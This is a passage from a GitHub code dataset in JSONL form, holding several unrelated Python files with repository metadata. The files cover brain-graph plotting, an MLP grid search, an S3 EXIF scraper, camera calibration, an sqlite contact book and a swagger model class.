\"Gda\"]\nadjs = []\nfor g in graph_types:\n temp_mg = load_metagraph(g)\n temp_mg.reindex(mg.meta.index, use_ids=True)\n temp_adj = temp_mg.adj\n adjs.append(temp_adj)\n\n# %% [markdown]\n# ## Combine them into the 2N graph...\nn_verts = len(adjs[0])\naxon_inds = np.arange(n_verts)\ndend_inds = axon_inds.copy() + n_verts\ndouble_adj = np.empty((2 * n_verts, 2 * n_verts))\ndouble_adj[np.ix_(axon_inds, axon_inds)] = adjs[1] # Gaa\ndouble_adj[np.ix_(axon_inds, dend_inds)] = adjs[0] # Gad\ndouble_adj[np.ix_(dend_inds, axon_inds)] = adjs[3] # Gda\ndouble_adj[np.ix_(dend_inds, dend_inds)] = adjs[2] # Gdd\n# double_adj[axon_inds, dend_inds] = 1000 # make internal edges, make em big\n# double_adj[dend_inds, axon_inds] = 1000\n\naxon_meta = mg.meta.rename(index=lambda x: str(x) + \"_axon\")\naxon_meta[\"compartment\"] = \"Axon\"\ndend_meta = mg.meta.rename(index=lambda x: str(x) + \"_dend\")\ndend_meta[\"compartment\"] = \"Dendrite\"\n\n\ndouble_meta = pd.concat((axon_meta, dend_meta), axis=0)\n\nfig, ax = plt.subplots(1, 1, figsize=(20, 20))\nadjplot(\n double_adj,\n plot_type=\"scattermap\",\n sizes=(1, 1),\n ax=ax,\n meta=double_meta,\n sort_class=[\"compartment\"],\n item_order=[\"merge_class\", \"pair_id\"],\n colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n)\nstashfig(\"double-adj\")\n\n\n#%%\nfig, axs = plt.subplots(2, 2, figsize=(20, 20), gridspec_kw=dict(hspace=0, wspace=0))\nmatrixplot_kws = dict(\n row_meta=mg.meta,\n col_meta=mg.meta,\n row_item_order=[\n \"merge_class\",\n \"pair_id\",\n ], # TODO maybe pick whatever we do in next figure\n col_item_order=[\"merge_class\", \"pair_id\"],\n # colors=[\"merge_class\"],\n palette=CLASS_COLOR_DICT,\n sizes=(1, 1),\n plot_type=\"scattermap\",\n)\n\nedge_type_palette = dict(zip(graph_types, sns.color_palette(\"deep\")))\n\nax = axs[0, 0]\nmatrixplot(adjs[1], ax=ax, color=edge_type_palette[\"Gaa\"], **matrixplot_kws)\nax.set(ylabel=\"Axon\", title=\"Axon\")\n\nax = axs[0, 1]\nmatrixplot(adjs[0], ax=ax, color=edge_type_palette[\"Gad\"], **matrixplot_kws)\nax.set(title=\"Dendrite\")\n\nax = axs[1, 0]\nmatrixplot(adjs[3], ax=ax, color=edge_type_palette[\"Gda\"], **matrixplot_kws)\nax.set(ylabel=\"Dendrite\")\n\nax = axs[1, 1]\nmatrixplot(adjs[2], ax=ax, color=edge_type_palette[\"Gdd\"], **matrixplot_kws)\nstashfig(\"4-color-adjplot\")", "repo_name": "neurodata/maggot_models", "sub_path": "notebooks/172.0-BDP-plot-4-color.py", "file_name": "172.0-BDP-plot-4-color.py", "file_ext": "py", "file_size_in_byte": 4615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "src.visualization.set_theme", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "src.io.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "src.io.savefig", "line_number": 70, "usage_type": "call"}, {"api_name": "src.io.savecsv", "line_number": 74, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 78, "usage_type": "call"}, {"api_name": "src.data.load_metagraph", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "src.data.load_metagraph", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ix_", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "src.visualization.adjplot", "line_number": 133, "usage_type": "call"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "src.visualization.CLASS_COLOR_DICT", "line_number": 158, "usage_type": "name"}, {"api_name": "seaborn.color_palette", "line_number": 163, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 166, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 170, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 174, "usage_type": "call"}, {"api_name": "src.visualization.matrixplot", "line_number": 178, "usage_type": "call"}]}
+{"seq_id": "31804258640", "text": "\"\"\"\nImplementation notes:\n • Since assignment guidelines did not specify the amount of max iterations, the default of 200 is given. MLP will therefore not converge\n • We use the training set to tune the hyperparameters, because the GridSearchCV library functions based on cross-validation. It can therefore\n only take in 1 dataset. Since the training set has more data, it is best to use it instead of the validation set.\n\"\"\"\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom utils import split_feats_targs, capture_features, capture_targets,export_results\n\n(train_features, train_targets) = split_feats_targs('train_1.csv') # pass training set with targets\ntest_features = capture_features('test_no_label_1.csv', False) # pass test set without targets\nactual_targets = capture_targets('test_with_label_1.csv') # pass test set with targets\n\n\"\"\"\nParameter options to tune:\n • activation function: sigmoid, tanh, relu and identity\n • 2 network architectures of your choice: for eg 2 hidden layers with 30+50 nodes, 3 hidden layers with 10+10\n • solver: Adam and stochastic gradient descent\n\"\"\"\n\nprint(\"Finding best hyperparameters for MLP....\")\nbest_mlp = GridSearchCV(MLPClassifier(), {\n 'activation': ['identity', 'logistic', 'tanh', 'relu'],\n 'hidden_layer_sizes': [(30,50), (10,10,10)],\n 'solver': ['sgd', 'adam']\n}, return_train_score = False, n_jobs = -1)\n\nbest_mlp.fit(train_features, train_targets)\nbest_params = best_mlp.best_params_ # records best found params from gridsearch\nprint(\"Best hyperparameters for MLP:\")\nprint(best_params)\nprint(\"\\n\")\n\nbest_mlp = MLPClassifier(activation=best_params['activation'],hidden_layer_sizes=best_params['hidden_layer_sizes'] ,solver=best_params['solver'])\nfitted_mlp = best_mlp.fit(train_features, train_targets) # fits model with training set values\npredicted_targets = list(fitted_mlp.predict(test_features)) # gets predictions from model and record them\nexport_results(actual_targets, predicted_targets, 'Best-MLP-DS1.csv')\n", "repo_name": "KonstH/comp472-a1", "sub_path": "dataset1/Best_MLP.py", "file_name": "Best_MLP.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.split_feats_targs", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.capture_features", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.capture_targets", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.export_results", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "5426024532", "text": "import xarray\nimport numpy\nimport matplotlib.pyplot as plt\n\nt = 0.01\nr = 0.75\n\nif __name__ == \"__main__\":\n value = [[1, 4, 2, 9], [2, 7, 6, 1], [6, 3, 5, 8], [3, 2, 2, 1]]\n plt.imshow(value)\n plt.show()\n ds = xarray.Dataset(\n data_vars={\n \"v\": (\n (\"x\", \"y\"),\n value,\n ),\n },\n coords={\"x\": [0.0, 0.75, 1.5, 2.25], \"y\": [3.0, 2.25, 1.5, 0.75]},\n )\n ds_xs = ds[\"x\"]\n ds_ys = ds[\"y\"]\n ds_xs = numpy.array(ds_xs)\n n_xs = numpy.arange(ds_xs[0]-r/2, ds_xs[len(ds_xs)-1] + r/2, t)\n n_ys = numpy.arange(ds_ys[0]+r/2, ds_ys[len(ds_ys)-1] - r/2, -t)\n n_ds = ds.interp(x=n_xs, y=n_ys, method=\"nearest\", kwargs={\"fill_value\": \"extrapolate\"})\n plt.imshow(n_ds[\"v\"])\n plt.show()\n # print(n_ds[\"v\"])", "repo_name": "Bosh0113/MISR_AHI", "sub_path": "AHI_AC/test/test_interp.py", "file_name": "test_interp.py", "file_ext": "py", "file_size_in_byte": 798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "xarray.Dataset", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "23214018126", "text": "from PyQt5.QtWidgets import QWidget\nfrom PyQt5.uic import loadUi\n\n\nclass MyWidget(QWidget):\n def __init__(self, uiFile, parent):\n # Se non funziona lo scroll di un qualsiasi scroll area + layout, devi stattare MIN/MAX\n # sulla form contenente il widget!!\n super().__init__(parent)\n loadUi(uiFile, self)\n for bigButton in list(filter(lambda el: 'icon' in el.lower(), self.__dict__.keys())):\n getattr(self, bigButton).setMargin(10)\n", "repo_name": "MrPio/MuseoOmero-Python", "sub_path": "frontend/view/my_widget.py", "file_name": "my_widget.py", "file_ext": "py", "file_size_in_byte": 479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "39708960869", "text": "import sqlite3\nimport uuid\n\nif __name__ == \"__main__\":\n\n print(\"MENU\")\n print(\"1. Insert new contact\")\n print(\"2. View all contact\")\n print(\"3. Search contact\")\n choice = int(input(\"Enter choice: \"))\n\n conn = sqlite3.connect('contact.db')\n cursor = conn.cursor()\n\n # check if table person exists\n # conn.execute(\"DROP TABLE PERSON\")\n try:\n conn.execute('''CREATE TABLE PERSON\n (ID TEXT PRIMARY KEY,\n NAME TEXT NOT NULL,\n NUMBER TEXT NOT NULL);''')\n print(\"Table created successfully\")\n\n except Exception as e:\n print(e)\n\n if choice == 1:\n nextId = str(uuid.uuid4())\n print(type(nextId))\n name = input(\"Name: \")\n number = input(\"Number: \")\n cursor.execute(\"insert into PERSON (ID, NAME, NUMBER) values (?, ?, ?)\",\n (nextId, name, number))\n conn.commit()\n print(\"Records created successfully\")\n\n elif choice == 2:\n data = conn.execute(\"SELECT id, name, number FROM PERSON\")\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n elif choice == 3:\n print(\"1. Search by name\")\n print(\"2. Search by number\")\n choice = int(input(\"Enter choice: \"))\n if choice == 1:\n name = input(\"Name: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE name =?\", (name,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n elif choice == 2:\n number = input(\"Number: \")\n data = conn.execute(\"SELECT id, name, number FROM PERSON WHERE number =?\", (number,))\n for row in data:\n print(\"ID = \" + row[0])\n print(\"NAME = \" + row[1])\n print(\"NUMBER = \" + str(row[2]) + '\\n\\n')\n\n conn.close()\n", "repo_name": "shafiq97/Python-Beginner-Project", "sub_path": "Contact Book.py", "file_name": "Contact Book.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "24219655687", "text": "# -*- coding:utf-8 -*-\nimport requests\nfrom lxml import etree\nimport os\n\nstart_urls = ['http://www.szpb.gov.cn/xxgk/qt/tzgg/index.htm']\nfor i in range(1, 41):\n start_urls.append('http://www.szpb.gov.cn/xxgk/qt/tzgg/index_' + str(i) + '.htm')\n\nfor url in start_urls:\n print(url)\n page_req = requests.get(url)\n html = page_req.text.encode('iso-8859-1').decode('gbk')\n selector = etree.HTML(html, parser=None, base_url=None)\n contents = selector.xpath('//span[contains(text(), \"节能\")][contains(text(), \"2015\")][contains(text(), \"项目公示\")][contains(@class, \"p_bt\")]/../@href')\n # if os.path.isfile('result.txt'):\n # os.remove(\"result.txt\")\n for text in contents:\n with open(\"result.txt\", \"a\") as file :\n link = 'http://www.szpb.gov.cn/xxgk/qt/tzgg/' + text.replace(\"./\", \"\")\n file.write(link + '\\n')", "repo_name": "ichsonx/fgwspider", "sub_path": "fgw.py", "file_name": "fgw.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "72701440169", "text": "'''\nScrape.py is the main scraper.\n\nIt scrapes the S3 Bucket XML, parses it, and navigates\nto each key. It attempts to download and pare the key\nof each file, skipping the key when it fails.\n\nIt uses an port of the Python Image Library to process\nbinary data retrieved from the S3 bucket. It then uses\nthe local db module to store the metadata and EXIF data\nof the image in the database.\n\nCurrently, it is tightly coupled to the waldo-recruting\nS3 bucket, and could use a layer of abstraction around\nimage locations.\n'''\n\n#Standard library modules\nimport time\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\nfrom os.path import splitext\n\n#Dependency modules\nimport requests\nfrom PIL import Image, ExifTags\n\n#Local modules\nfrom db import ImageDatabase as ID\n\nS3_DOCS = '{http://s3.amazonaws.com/doc/2006-03-01/}'\nBUCKET_URL = 'http://s3.amazonaws.com/waldo-recruiting'\n\n#Downloads the images from the S3 bucket\ndef run():\n #Setup database\n db = ID()\n db.setup()\n\n resp = requests.get(BUCKET_URL)\n bucket_result = ET.fromstring(resp.text)\n contents_elems = bucket_result.findall('%sContents' % S3_DOCS)\n for e in contents_elems:\n filename = e.find('%sKey' % S3_DOCS).text\n print('Inserting ', filename)\n url = \"%s/%s\" % (BUCKET_URL, filename)\n try:\n photo = Image.open(BytesIO(requests.get(url).content))\n except OSError as e:\n print(filename, ' failed to open. Skipping...')\n continue\n\n photo_id = db.insert_photo(\n url,\n filename,\n splitext(filename)[1],\n photo.height,\n photo.width\n )\n try:\n photo_exif = photo._getexif()\n except AttributeError as ae:\n print(filename, \"has no exif data. Keeping image and skipping exif\")\n continue\n for tag_no, value in photo_exif.items():\n try:\n tag_name = ExifTags.TAGS[tag_no]\n except KeyError as ke:\n print(\"Exif tag not recognized. Skipping...\")\n continue\n \n #Bad values are currently being skipped. A future improvement\n #could handle bad values more gracefully by working with\n #database schema improvements to work with specific data\n #more directly.\n print(\"Adding\", tag_name, \"to photo\", photo_id, \"-\", value)\n try:\n db.insert_exif(photo_id, tag_no, ExifTags.TAGS[tag_no], value)\n except ValueError as ve:\n print(tag_name, \"had a bad value. Skipping...\")\n continue\n print(filename, ' successfully inserted')\n time.sleep(999999999)\n\nif __name__ == '__main__':\n run()\n", "repo_name": "downpat/exif-scraper", "sub_path": "scraper/scrape.py", "file_name": "scrape.py", "file_ext": "py", "file_size_in_byte": 2746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.ImageDatabase", "line_number": 37, "usage_type": "call"}, {"api_name": "db.setup", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 41, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 41, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 48, "usage_type": "call"}, {"api_name": "db.insert_photo", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 67, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 67, "usage_type": "name"}, {"api_name": "db.insert_exif", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "26380597293", "text": "from django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\nfrom .authentication import *\nfrom io import StringIO\nfrom rest_framework.parsers import JSONParser\nimport json\n\nclass OverwiteStorageSystem(FileSystemStorage):\n \n def get_available_name(self, name, max_length=None):\n # if the file name already exists, remove it as if it was a true file system\n if self.exists(name):\n self.delete(name)\n return super().get_available_name(name, max_length)\n\n\ndef range_with_floats(start, stop, step=1):\n while stop > start:\n yield start\n start += step\n\ndef get_host_name(request):\n if request.is_secure():\n return f'https://{request.get_host()}'\n return f'http://{request.get_host()}'\n\n\ndef get_list_index(list, index, default):\n try:\n return list[4]\n except IndexError:\n return default\n", "repo_name": "samuelitwaru/wex-erp", "sub_path": "utils/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "12191640907", "text": "import cv2\nfrom cv2 import drawChessboardCorners\nimport numpy as np\ncap = cv2.VideoCapture(0)\npic = []\n\nobjp = np.zeros((9*6,3), np.float32)\n# for i in range(6):\n# for j in range(9):\n# objp[i*9+j]=(i,j,0)\n\nobjp[:, :2]=np.mgrid[0:9, 0:6].T.reshape(-1, 2)\nprint(objp)\nobjpoints = []\nimgpoints = []\nwhile len(objpoints) < 50:\n ret, frame = cap.read()\n h,w = frame.shape[:2]\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n ret2, corner = cv2.findChessboardCorners(gray_frame, (9,6))\n cv2.imshow(\"frame\", frame)\n cv2.waitKey(33)\n if ret2:\n corner2 = cv2.cornerSubPix(gray_frame,corner, (11,11), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1))\n objpoints.append(objp.copy())\n imgpoints.append(corner2)\n drawn_frame = drawChessboardCorners(frame, (9, 6), corner2, ret2)\n cv2.imshow(\"frame\", drawn_frame)\n cv2.waitKey(33)\n\nret, cameraMatrix, distCoeffs, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, (h, w), None, None)\nf = cv2.FileStorage(\"calibrate.xml\", cv2.FILE_STORAGE_WRITE)\nf.write(\"intrinsic\", cameraMatrix)\nf.write(\"distortion\", distCoeffs)\nf.release()", "repo_name": "jayin92/NYCU-cv-and-uav", "sub_path": "lab04/camerea_cali.py", "file_name": "camerea_cali.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cornerSubPix", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.FileStorage", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FILE_STORAGE_WRITE", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "24656845249", "text": "# © 2023, Universität Bern, Chair of Quantitative Methods, Vanessa Tran, Manuel Kammermann, Philipp Baumann\n\nimport pandas as pd\nimport numpy as np\nfrom mpfcc_algorithm import mpfcc\nimport matplotlib.pyplot as plt\n\n# Read data of illustrative example\ndf = pd.read_csv('illustrative_example.csv')\n\n# Extract features and colors\nX = df.values[:, 1:-1]\ncolors = df.values[:, -1].astype(int)\n\n# Define parameters\nnumber_of_clusters = 3\nmax_cardinality = 11\nmin_balance = 1\n\n# Run MPFCC-Algorithm\nlabels = mpfcc(X, colors, number_of_clusters, max_cardinality, min_balance,\n random_state=24, mpfcc_time_limit=300)\n\n# Visualize resulting partition\ncenters = np.unique(labels)\nplt.scatter(X[:, 0], X[:, 1], c=np.array(['red', 'blue'])[colors], s=30, zorder=10)\nfor i in range(X.shape[0]):\n plt.plot([X[i, 0], X[labels[i], 0]], [X[i, 1], X[labels[i], 1]],\n color='black', linewidth=0.8, zorder=-1, alpha=0.2)\nplt.show()\n", "repo_name": "phil85/MPFCC-Algorithm", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "mpfcc_algorithm.mpfcc", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]}
+{"seq_id": "1104321639", "text": "# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.account_identifier import AccountIdentifier # noqa: F401,E501\nfrom swagger_server.models.amount import Amount # noqa: F401,E501\nfrom swagger_server.models.coin_change import CoinChange # noqa: F401,E501\nfrom swagger_server.models.operation_identifier import OperationIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass Operation(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, operation_identifier: OperationIdentifier=None, related_operations: List[OperationIdentifier]=None, type: str=None, status: str=None, account: AccountIdentifier=None, amount: Amount=None, coin_change: CoinChange=None, metadata: object=None): # noqa: E501\n \"\"\"Operation - a model defined in Swagger\n\n :param operation_identifier: The operation_identifier of this Operation. # noqa: E501\n :type operation_identifier: OperationIdentifier\n :param related_operations: The related_operations of this Operation. # noqa: E501\n :type related_operations: List[OperationIdentifier]\n :param type: The type of this Operation. # noqa: E501\n :type type: str\n :param status: The status of this Operation. # noqa: E501\n :type status: str\n :param account: The account of this Operation. # noqa: E501\n :type account: AccountIdentifier\n :param amount: The amount of this Operation. # noqa: E501\n :type amount: Amount\n :param coin_change: The coin_change of this Operation. # noqa: E501\n :type coin_change: CoinChange\n :param metadata: The metadata of this Operation. # noqa: E501\n :type metadata: object\n \"\"\"\n self.swagger_types = {\n 'operation_identifier': OperationIdentifier,\n 'related_operations': List[OperationIdentifier],\n 'type': str,\n 'status': str,\n 'account': AccountIdentifier,\n 'amount': Amount,\n 'coin_change': CoinChange,\n 'metadata': object\n }\n\n self.attribute_map = {\n 'operation_identifier': 'operation_identifier',\n 'related_operations': 'related_operations',\n 'type': 'type',\n 'status': 'status',\n 'account': 'account',\n 'amount': 'amount',\n 'coin_change': 'coin_change',\n 'metadata': 'metadata'\n }\n self._operation_identifier = operation_identifier\n self._related_operations = related_operations\n self._type = type\n self._status = status\n self._account = account\n self._amount = amount\n self._coin_change = coin_change\n self._metadata = metadata\n\n @classmethod\n def from_dict(cls, dikt) -> 'Operation':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Operation of this Operation. # noqa: E501\n :rtype: Operation\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def operation_identifier(self) -> OperationIdentifier:\n \"\"\"Gets the operation_identifier of this Operation.\n\n\n :return: The operation_identifier of this Operation.\n :rtype: OperationIdentifier\n \"\"\"\n return self._operation_identifier\n\n @operation_identifier.setter\n def operation_identifier(self, operation_identifier: OperationIdentifier):\n \"\"\"Sets the operation_identifier of this Operation.\n\n\n :param operation_identifier: The operation_identifier of this Operation.\n :type operation_identifier: OperationIdentifier\n \"\"\"\n if operation_identifier is None:\n raise ValueError(\"Invalid value for `operation_identifier`, must not be `None`\") # noqa: E501\n\n self._operation_identifier = operation_identifier\n\n @property\n def related_operations(self) -> List[OperationIdentifier]:\n \"\"\"Gets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :return: The related_operations of this Operation.\n :rtype: List[OperationIdentifier]\n \"\"\"\n return self._related_operations\n\n @related_operations.setter\n def related_operations(self, related_operations: List[OperationIdentifier]):\n \"\"\"Sets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :param related_operations: The related_operations of this Operation.\n :type related_operations: List[OperationIdentifier]\n \"\"\"\n\n self._related_operations = related_operations\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :return: The type of this Operation.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :param type: The type of this Operation.\n :type type: str\n \"\"\"\n if type is None:\n raise ValueError(\"Invalid value for `type`, must not be `None`\") # noqa: E501\n\n self._type = type\n\n @property\n def status(self) -> str:\n \"\"\"Gets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :return: The status of this Operation.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status: str):\n \"\"\"Sets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. On-chain operations (operations retrieved in the `/block` and 